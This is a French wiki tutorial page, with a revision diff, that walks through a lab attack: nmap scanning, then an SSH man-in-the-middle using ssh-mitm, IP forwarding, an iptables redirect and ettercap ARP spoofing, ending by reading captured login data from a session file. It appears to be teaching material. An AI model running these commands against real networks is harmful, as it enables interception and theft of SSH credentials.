« Utilisation de Utilisation de Kali » : différence entre les versions
Page créée avec « == Utilisation de Kali == === Découverte des hôtes et services présents sur un réseau local === En tant qu’attaquant, la première étape consiste à recueillir des informations sur le réseau dans lequel nous nous trouvons. Ainsi, à l’aide de l’outil nmap présent sur Kali Linux : ==== Réaliser un scan du réseau ==== sudo nmap -sP 192.168.56.0/24 ==== Scanner un hôtes ==== Afin de savoir quels ports sont ouverts sur ceux-ci et quels servi... » |
Aucun résumé des modifications |
||
Ligne 33 : | Ligne 33 : | ||
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222 | sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222 | ||
Lancer attaque avec la commande ettercap | |||
sudo ettercap -i eth0 -T -M arp /192.168.56.10// /192.168.56.11// | sudo ettercap -i eth0 -T -M arp /192.168.56.10// /192.168.56.11// |
Version du 30 novembre 2023 à 20:35
Utilisation de Kali
Découverte des hôtes et services présents sur un réseau local
En tant qu’attaquant, la première étape consiste à recueillir des informations sur le réseau dans lequel nous nous trouvons. Ainsi, à l’aide de l’outil nmap présent sur Kali Linux :
Réaliser un scan du réseau
sudo nmap -sP 192.168.56.0/24
Scanner un hôtes
Afin de savoir quels ports sont ouverts sur ceux-ci et quels services sont proposés
sudo nmap -sV 192.168.56.10
Attaque MITM d’un service SSH
Se déplacer dans le répertoire ssh-mitm
cd ssh-mitm
lancer le service ssh-mitm
sudo ./start.sh
activer le routage
sudo sysctl -w net.ipv4.ip_forward=1
Configurer redirection de ports afin de rediriger tous les flux à destination de la machine attaquante sur le port 22/TCP vers le port 2222 du système Kali Linux
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
Lancer attaque avec la commande ettercap
sudo ettercap -i eth0 -T -M arp /192.168.56.10// /192.168.56.11//
• -T : lance ettercap en mode texte ; • -M : indique que l'on veut une attaque de type "Man in the middle" ; • 192.168.56.10 (serveur ssh) et 192.168.56.11 (client SSH) sont les adresses IP des victimes
Sur le poste de l’attaquant (Kali), il faut d’arrêter l’attaque ARP Spoofing, taper la touche Q pour arrêter.
arrêter le service ssh-mitm :
sudo ./stop.sh
aller chercher les information de connexion avec la commande suivante
sudo nano /home/ssh-mitm/shell_session_0.txt